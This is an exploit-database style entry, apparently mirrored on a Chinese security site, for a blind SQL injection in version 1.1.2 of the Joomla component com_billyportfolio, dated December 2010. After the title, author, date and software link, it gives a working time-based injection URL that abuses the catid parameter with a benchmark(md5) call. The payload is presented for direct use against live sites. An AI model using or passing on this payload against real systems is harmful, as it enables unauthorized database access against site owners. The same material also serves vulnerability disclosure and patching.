Joomla! Component com_billyportfolio 1.1.2 – Blind SQL Injection - 体验盒子

作者： jdc

日期： 2010-12-10

类别：

平台：

1

2

3

4

5

6

7

8

# Exploit Title: Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection

# Date: 10 Dec 2010

# Author: jdc

# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/portfolio/14834

# Version: 1.1.2

index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and if(1,benchmark(5000000,md5(1)),1)